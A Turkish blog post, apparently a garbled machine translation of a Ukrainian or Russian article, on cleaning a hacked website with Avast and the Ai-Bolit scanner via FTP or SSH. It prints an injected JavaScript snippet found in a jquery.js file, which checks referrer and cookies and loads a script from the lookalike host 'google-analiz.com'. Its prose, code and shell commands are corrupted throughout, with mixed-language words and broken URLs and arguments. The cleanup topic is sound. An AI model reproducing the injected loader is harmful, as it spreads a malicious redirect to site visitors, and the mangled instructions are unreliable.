json dosyasının yeniden doğrulama durumunu kaydedin. Bu dosya, json biçiminde en yapılandırılmış verilere sahiptir: akış yeniden doğrulama dosyası, yeniden doğrulanan dosya sayısı, yeniden doğrulanacak dosya sayısı, yeniden doğrulama zaman damgaları, taramanın sonuna kadar bir saat. Bu mekanizma kontrol edilebilir, böylece panelde ilerleme çubuğunu ve kontrol edilen dosyalar hakkındaki verileri gösterebilirsiniz. Tarama tamamlandığında, dosya otomatik olarak silinecektir.

php ai-bolit.php --handler=/path/hander.php

Zovnishniy obrobnik podіy. Taramanın koçanına/tamamlanmasına/taramanın ilerlemesine/taramanın affedilmesine bazı iyi veriler ekleyebilirsiniz. Örnek dosya, tool/handler.php dizinindeki tarayıcı arşivlerinde görüntülenebilir. Örneğin, tarama tamamlandıktan sonra dosyayı skroplayabilirsiniz (posta ile gönderin, daha sonra arşivlere paketleyin).

Bugün benden önce çevrimiçi mağazayı virüslerden temizlemek için yardım istediler. Sözcülerden biri için istenmeyen geldi Google Reklamları adwords. Sayfada dosyanın ne olduğu söylendi jquery.js kayıtlı şüpheli kod

Tarayıcıya yardım etmeye devam ettim, dosyanın yolunu açtım, ancak Avast antivirüs tepki vermedi dani dosyası, görsel olarak zaten bir shkidlivy koduna sahip olmak istememe rağmen. Sonra FileZilla yardımı için ftp'ye gittim ve dosyayı Notepad++ yardımıyla açmaya çalıştım. І burada benim antivirüsüm dosyaya erişimi engelliyor.

Virüsteki js dosyasını temizlemek için AVAST'ı 10 dakika açtım ve ardından dosyadan satırları sildim.

Benzer bir sorunla karşılaştıysanız, saldırgan kodu küçük olanda veya satırlarda gösterildiği gibi görebilirsiniz.

Varr=belge.referrer; var c=document.cookie; r1=0; if ((r.indexOf("yandex")>0) || (r.indexOf("google")>0) || (r.indexOf("rambler")>0) || (r.indexOf(" mail")>0)) ( document.cookie = "__ga1=1; vades=1 Mart 2020 Çar 00:00:00; path=/;"; r1=1; ) else (if (c.indexOf(" __ga1")==-1)(document.cookie = "__ga2=1; sona erer=Çarş, 1 Mart 2020 00:00:00; path=/;";)) if (((c.indexOf("__ga1") ) )>-1) || (r1==1)) && (c.indexOf("__ga2")==-1)) (document.write(unescape("%3Cscript src="http://google-) analiz) .com/urchin.js" type="text/javascript"%3E%3C/script%3E");)

Site yedekleme.

Örneğin, ek yardımcı program macunu ve mümkünse sitenin arşivleri için bize ssh erişimi aracılığıyla erişim sağladılar. Konsolda saldırgan bir komutla hızlandırmak kimin için yeterlidir:

tar - cf yedekleme .tar /home/login/site/public_html


*/home/login/site/public_html - sitenin ana dizinine giden yol

Siteyi yedekleyebilir ve çalışmayabilir, ancak bunun ne kadar önemli olduğunu görebiliyor musunuz?

Şimdi virüste siteyi kontrol etmek için iki seçenek var

1. Sitenin gözden geçirilmesi php'ye yardım et Farklı virüsleri ve php kabuğunu algılayan Ai-Bolit betiği.

2. Tüm siteyi bilgisayarınıza alın ve uzaklaştırın avast antivirüs, ancak ilk seçenek önemli ölçüde daha kısa, daha iyi ve önemli ölçüde daha düşüktür.

Siteyi yerel bilgisayarda temizleme

Elimin arkasında yogoyu tarif edeceğim farklı bir şekilde çömeldim. Tüm dosyalar (veya arşivler) bilgisayara indirildiğinden ve 25.000'lik birkaç troch olmadığından, Avast'ı açtım ve shkidliv komut dosyalarında yeniden doğrulamaları için dosyaların bulunduğu klasörü siteye girdim.

Avast, web sitesi dosyaları için klasörleri taradığından, iki komut dosyası virüsü algılandı:

  • php-shell-jv
  • js-yönlendirici-fc

index.php dosyası rahatsız edici koddan oluşur:

"ui.datepicker_old.js" javascript dosyası, betiğin en altında shky koduna sahiptir. Bu kodun görülmesi gerekiyor!

Ai-Bolit'in yardımıyla sitenin virüslerden temizlenmesi.

FTP yöntemi.

1. Aibolit betiği açıkken arşivleri yakalama yerel bilgisayar ve yoga paketini açın.

2. FileZilla istemcisinin yardımı için ftp ile katılın

3. Arşiv dosyalarının açılması, sitenin /home/siteniz/public_html ana dizinine yerleştirilir.

4. http://alanınız/ai-bolit.php komut dosyasını çalıştırın

5. İsim dosyası, isim ile ana dizinde oluşturulacaktır. AI-BOLIT-REPORT.html

Komut dosyası başlatılır başlatılmaz temiz bir beyaz ekran belirir, ardından barındırma sağlayıcısının sunucusundaki php sürümü Aibolit için uygun değildir.

Saygı duymak! Dizindeki tüm siteleri, /home/domains/ veya /home/ klasöründeki zavantazhuemo betiğini tekrarlamak gerekir, ardından Ai-Bolit tüm klasörleri tekrar tekrar gözden geçirir ve kulağa öyle geliyor, ancak yeniden kontrol etmenin daha kolay olduğunu düşünüyorum bir etki alanı.

Konsol seçeneği (SSH)

1. Putty programını veya başka bir konsol programını çalıştırın.

2. Sunucuya ana bilgisayar ve parola ile bağlanın.

3. Komutla sitenin ana dizinine gidin cd /home/giriş bilgileriniz/siteniz/public_html/

4. Komut dosyasını komutla yakalayın wget http://www..zip

5. Ambalajsız zip arşivleri takım sıkıştırmayı aç 20160904_112415ai-bolit.zip

6. Komut dosyasını çalıştırın php ai-bolit.php

Lansman için arka plan modu komutu kazanın: ekran -d -m php ai-bolit.php

7. Komut dosyasının hala kontrol edilip edilmediğini kontrol edin ve bir ses çıkarın " AI-BOLIT-REPORT.html"sunucuda.

Ayrıca saygılar, sunucunuzda 5.3'ten düşük php kurulu olduğundan, Aibolit bir af gösterecek ve taramayı başlatmayacaktır. Aklıma siteyi indirip sunucumda revize etme şansı geldi.

Ses dosyası sunucuda oluşturulduktan sonra bilgisayarınıza indirebilir ve en iyi tarayıcıya (Chrome, Firefox vb.) bakabilirsiniz.

Vartodan önce, "Shkidlivy scriptleri" ile ilgili çağrıya dikkat edin, peki, ya qi dosyalarını dikkatlice görelim ya da temizleyelim. manuel olarak nasıl yemin ederim.

© 2022 androidas.ru - Android hakkında her şey